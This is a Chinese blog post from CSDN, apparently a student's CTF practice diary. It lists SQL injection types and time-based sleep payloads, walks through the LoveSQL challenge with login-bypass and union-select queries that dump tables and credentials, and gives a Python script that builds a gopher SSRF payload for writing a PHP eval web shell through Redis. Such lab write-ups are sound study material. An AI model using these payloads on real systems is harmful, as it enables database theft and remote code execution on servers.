被监督写博客-Day2

最新推荐文章于 2020-10-14 22:02:31 发布
最新推荐文章于 2020-10-14 22:02:31 发布
阅读量102 收藏
点赞数
分类专栏: 日常学习小记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/veinard_F/article/details/108926010
版权
  1. 报错注入:一般是加单引号,看回显的error,看是哪里存在sql注入;
  2. 联合查询注入:一般是用order by去看有几个字段,还有union select;
  3. 布尔盲注:对于页面的回显只有TRUE和FALSEl两种,一般要通过回显来判断需要构造的语句;
  4. 时间注入:判断时间型注入时,只要让sleep()函数执行成功,就可以根据回显时间判断是否为时间型注入。几个判断时间注入的语句,一般用if语句,语句一为真则执行语句二,否则执行语句三

’ and if(1=0,1, sleep(10)) --+

" and if(1=0,1, sleep(10)) --+

) and if(1=0,1, sleep(10)) --+

') and if(1=0,1, sleep(10)) --+

") and if(1=0,1, sleep(10)) --+

题目一:
[极客大挑战 2019]LoveSQL
这道题之前做的时候看wp没看明白,这次重新做了一下,有了一些其他的理解。
首先是用万能密码登陆,
用户名:1’ or 1=1#
密码:123(随便)
得到回显
在这里插入图片描述
知道了用户名和密码
不过既然是sql注入的题目,那肯是还是要继续找注入点
按照正常的注入思路,先爆字段
在这里插入图片描述
有三个
用union查询注入点

check.php?username=1'%20union select 1,2,3%23&password=123

在这里插入图片描述

数据库名及版本

check.php?username=1'%20union select 1,database(),version()%23&password=123

爆表

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=123

爆数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=123

得到flag

题目二:
[GKCTF2020]EZ三剑客-EzWeb
通过这个题目复习了burpsuit的抓包以及跑字典
在源码处找到提示,在这里插入图片描述
访问一下,得到
在这里插入图片描述

用file协议读文件,file://被过滤,可以file:/,
在这里插入图片描述
读到关键代码
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在173.110.228.12这个IP得到提示
在这里插入图片描述
扫描到6379端口,是redis服务

import urllib.parse
protocol="gopher://"
ip="173.110.228.12"
port="6379"
shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]              #构造redis命令
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)

得到

gopher://173.110.228.12:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

不过payload之后并没有。。。。不懂了不懂了。。。

piubiutiu~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vue2-day3.zip
08-10
在"vue2-day3.zip"这个压缩包中,我们很可能看到的是关于Vue 2.x版本的第三天学习资料,这可能包括教程、代码示例或者项目实践等内容。Vue 2.x是Vue.js的一个重要版本,它引入了许多改进和优化,使得开发更加高效和...
Power PMAC 5-Day Training
05-18
Day 2 (Beginner Class Part 2) * Power PMAC调试工具概述:Power PMAC提供了多种调试工具,包括调试软件、调试硬件等。 * 伺服环路调整:Power PMAC支持伺服环路调整,实现高精度的运动控制。 * 电流环路调整:...
监督博客-Day6
veinard_F的博客
10-09 193
今天做的这道题也不是很难,就是在做题的时候需要联系一些函数的功能,先记录一下这些函数: scandir()可以扫描当前目录下的文件 localeconv() 返回一包含本地数字及货币格式信息的数组 array_reverse()以相反的元素顺序返回数组 array_flip()交换数组的键和值 array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回 current()返回数组当前的值 next()将内部指针指向数组中的下一个元素,并输出 题目 [GXYCTF2019]禁止套
监督博客-Day8
veinard_F的博客
10-12 141
又是头秃的周末。。。 题目一: [BJDCTF 2nd]old-hack 提示是thinkphp5的漏洞 漏洞利用: 题目二: [BJDCTF2020]Mark loves cat 用dirsearch扫描发现.git泄露 (注意调低线程:dirsearch.py -u url -e * --timeout=2 -t 1 -x 400,403,404,500,503,429) <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsom
监督博客-Day4
veinard_F的博客
10-07 98
ssrf 一些函数表示: //创建一个curl资源 $ch=curl_init(); //设置URL和相应的选项 curl_setopt($ch,CURLOPT_URL,"http://XXXXXXX/“); curl_setopt($ch,CURLOPT_HEADER,0);//设置成0表示将返回的内容直接输出,若是1或者true则是直接存储不输出 //抓取url并传给浏览器 curl_exec($ch); //关闭curl系统,并释放系统资源 curl_close($ch); 题目:[网鼎杯 2
监督博客-Day7
veinard_F的博客
10-10 209
今天在ctftime上找了比赛,但是吧,不太行,只能等着明天结束后的wp了。。。 回归刷题日常 题目一: [极客大挑战 2019]HardSQL(说真的,真的不喜欢SQL注入的题。。。) 打开题目后又是熟悉的界面。。。 看了wp说是报错注入, 学习一下两个函数 updatexml():更新xml文档 语法updatexml(目标xml文档,xml路径,更新的内容) extractvalue() :对XML文档进行查询的函数 语法:extractvalue(目标xml文档,xml路径) 两个函数的第二个参数
监督博客-Day3
veinard_F的博客
10-06 157
nmap命令中的-oG命令可以将命令和结果入文件。 题目:[BUUCTF 2018]Online Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host
监督博客-Day1
veinard_F的博客
10-04 152
做题目时需要python,想到自己很久之前的pycharm还没配置好,就去搞了一下,百度之后找到了pycharm2020版的破解补丁,凭着记忆装好了之后又发现自己的phpstorm不大行了,没办法就按照相同的步骤重新安装,不过网上没有2020.2的破解版补丁和激活码,导致我下了三个版本的phpstorm,浪费了我一上午的时间,最后是2020.1.1的可以,,,昂,其实无论是phpstorm还是pycharm(目前主要是phpstorm)都还存在着一些问题,比如只能本地运行或者只能浏览器上运行(待解决)之前
监督博客-Day5
veinard_F的博客
10-09 94
几个函数的学习: file_exists() 函数:检查文件或目录是否存在; mkdir() 函数:创建目录; json_decode()函数:对json格式的字符串进行编码; json_decode ( string $json [, bool $assoc = false [, int $depth = 512 [, int $options = 0 ]]] ) json_decode接受一个JSON格式的字符串并且把它转换为PHP变量 ,当该参数$assoc为TRUE时,将返回array,否则返回o
监督博客--Day9 and Day10
veinard_F的博客
10-14 220
对于phar反序列化的学习: 概念:(php ARchive) phar文件是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,phar://与file:// ,php://等类似,也是一种流包装器。 phar 文件结构: 1、a stub 必须以__HALT_COMPILER();?>来结尾,使phar扩展能够识别这个文件为phar文件 2、manifest phar文件本质上是一种压缩文件,每个被压缩文件的权限、属性等信息都放在这部分。另外,这部分还
Python学习-day2
weixin_30507481的博客
12-23 86
这周时间充裕,把第一周的两个作业登陆验证和三级菜单做完后又用零零散散的时间看完了第二周的课程,不得不说老男孩这个教育方式感觉还是不错的,其实说白了就是花钱找个人监督自己学习呗,而且还强行让我们养成一些好习惯,博客也好,流程图也好,还有ReadMe的一些规范,希望自己也可以坚持下去。 下面简单回顾一下第二周的课程的知识点: 一、模块初识 只讲了两个基础模块 sys: #Au...
react-day-picker:React的轻量级日期选择器组件
02-03
npm install react-day-picker import DayPicker from " react-day-picker " ; import " react-day-picker/lib/style.css " ; export default function Hello () { return ; } 文献资料 在卡住? v8即将到来! 下...
MySQL基础-day2.sql
04-13
MySQL基础-day2.sql
vue2-day4.zip
08-10
在"vue2-day4.zip"这个压缩包中,我们可能涵盖了关于Vue 2的第四天学习内容,这通常会涉及到更深入的特性和应用实践。 在Vue 2中,核心概念包括组件化、数据绑定、指令、计算属性和侦听器等。组件是Vue的一个重要...
基于springcloud微服务开发平台
最新发布
07-22
采用前后端分离的模式,前端开源两个框架:Sword (基于 React、Ant Design)、Saber (基于 Vue、Element-UI) 后端采用SpringCloud全家桶,并同时对其基础组件做了高度的封装,单独开源出一个框架:BladeTool BladeTool已推送至Maven中央库,直接引入即可,减少了工程的臃肿,也可更注重于业务开发 集成Sentinel从流量控制、熔断降级、系统负载等多个维度保护服务的稳定性。 注册中心、配置中心选型Nacos,为工程瘦身的同时加强各模块之间的联动。 极简封装了多租户底层,用更少的代码换来拓展性更强的SaaS多租户系统。 借鉴OAuth2,自研多终端认证系统,可控制子系统的token权限互相隔离。 借鉴Security,自研Secure模块,采用JWT做Token认证,可拓展集成Redis等细颗粒度控制方案。 稳定生产了六年,经历了从 Camden -> Hoxton -> 2023 的技术架构,也经历了从fat jar -> docker -> k8s + jenkins的部署架构。 项目分包明确,规范微服务的开发模式,使包与包
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包
07-22
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包 页面是jsp,数据库sqlserver,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 诗韵人间网站 系统管理 修改密码 年代管理 年代录入 诗词管理 诗词录入 诗词搜索 留言板 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码)
07-22
【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正
凯度:2022凯度银行保险行业品牌建设报告:以差异化博弈变局,洞察银行保险业的品牌增长之道(1).pdf
07-22
凯度:2022凯度银行保险行业品牌建设报告:以差异化博弈变局,洞察银行保险业的品牌增长之道(1).pdf
day--和--day区别
04-18
"day--"和"day"是两种不同的操作符,它们在编程中有着不同的含义和用法。 1. "day--"是一个后缀自减操作符,用于将变量的值减1,并返回减1之前的值。例如,如果有一个变量day的值为5,执行day--操作后,day的值将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值